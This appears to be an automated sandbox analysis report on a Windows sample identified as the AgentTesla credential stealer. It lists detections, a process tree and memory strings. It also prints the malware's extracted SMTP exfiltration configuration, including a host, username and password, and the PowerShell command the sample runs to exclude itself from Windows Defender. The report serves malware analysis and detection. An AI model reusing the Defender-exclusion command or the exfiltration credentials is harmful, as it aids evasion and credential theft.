Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Trojan.Mardom.MN.15.10720.19728

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.Mardom.MN.15.10720.19728 (renamed file extension from 19728 to exe)
Analysis ID:483768
MD5:f116c183d3684fe8c6d8435aef94fd41
SHA1:f92ea1cee647bbbae7ed522450428607f4ae3ee4
SHA256:9664d7052873349992d586788296c16579941a802a41b70afdc08867b2153d65
Tags:exe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Injects a PE file into a foreign processes
Sigma detected: Powershell Defender Exclusion
Adds a directory exclusion to Windows Defender
Moves itself to temp directory
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Detected TCP or UDP traffic on non-standard ports
Contains functionality to detect virtual machines (SLDT)
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe (PID: 3740 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe' MD5: F116C183D3684FE8C6D8435AEF94FD41)
    • powershell.exe (PID: 6444 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "administracion@insergejk.com", "Password": "42010892", "Host": "mail.insergejk.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.36caa98.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.36caa98.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.37dd780.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.37dd780.5.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    7.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 3 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe' , ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, ParentProcessId: 3740, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', ProcessId: 6444
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe' , ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, ParentProcessId: 3740, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe', ProcessId: 6444
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132761783863672192.6444.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 7.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "administracion@insergejk.com", "Password": "42010892", "Host": "mail.insergejk.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeReversingLabs: Detection: 13%
                      Source: 7.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49843 -> 64.202.184.79:587
                      Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                      Source: Joe Sandbox ViewIP Address: 64.202.184.79 64.202.184.79
                      Source: global trafficTCP traffic: 192.168.2.4:49843 -> 64.202.184.79:587
                      Source: global trafficTCP traffic: 192.168.2.4:49843 -> 64.202.184.79:587
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938832005.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://insergejk.com
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938832005.0000000002F4D000.00000004.00000001.sdmpString found in binary or memory: http://mail.insergejk.com
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712594836.0000000002601000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmpString found in binary or memory: http://uEmkbr.com
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712100291.0000000000C67000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.como
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.712100291.0000000000C67000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comoitud
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.715869303.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938814213.0000000002F47000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000003.916484773.0000000000C34000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938715206.0000000002F10000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.938861011.0000000002F57000.00000004.00000001.sdmpString found in binary or memory: https://GfxT7Yj8XaSeYQqdvs.com
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: mail.insergejk.com

                      System Summary:

                      barindex
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 0_2_0245C9240_2_0245C924
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 0_2_0245ECE00_2_0245ECE0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 0_2_0245ECF00_2_0245ECF0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_00C118D07_2_00C118D0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_00C1ACD87_2_00C1ACD8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_00C164E07_2_00C164E0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_00C1D4F07_2_00C1D4F0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_00C131887_2_00C13188
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_00C181A07_2_00C181A0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_00C171A07_2_00C171A0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_010519607_2_01051960
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_010518507_2_01051850
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_010564887_2_01056488
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_0105AEE87_2_0105AEE8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_01056C207_2_01056C20
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_0105C7487_2_0105C748
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_0105EE4A7_2_0105EE4A
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_0105A2A87_2_0105A2A8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_01058ED07_2_01058ED0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_011247A07_2_011247A0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_011246B07_2_011246B0
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.718029537.00000000083B0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameEnvoySinks.dll6 vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.717400332.0000000006BD0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.710812445.00000000002E8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStaticArrayInitTypeSize8.exeh$ vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameYxrQNXqVpQjbEwBXrxdpqkJllwDzZfeFOxwSyEQ.exe4 vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000000.709734968.00000000007A8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStaticArrayInitTypeSize8.exeh$ vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameYxrQNXqVpQjbEwBXrxdpqkJllwDzZfeFOxwSyEQ.exe4 vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe, 00000007.00000002.935992819.0000000000B58000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeBinary or memory string: OriginalFilenameStaticArrayInitTypeSize8.exeh$ vs SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeReversingLabs: Detection: 13%
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvugezh2.wz1.ps1Jump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/5@2/1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_01
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 0_2_002329B2 push 20000001h; retf 0_2_002329C0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 0_2_0245FAD0 pushfd ; retf 0_2_0245FAD1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_006F29B2 push 20000001h; retf 7_2_006F29C0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_00C1F870 push edi; retf 7_2_00C1F8BE
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_0105D178 push 6F040104h; retf 7_2_0105D1BE
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_0105003B push edi; retf 7_2_0105003E
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeCode function: 7_2_0105CCE0 push ebx; retf 7_2_0105CDCE
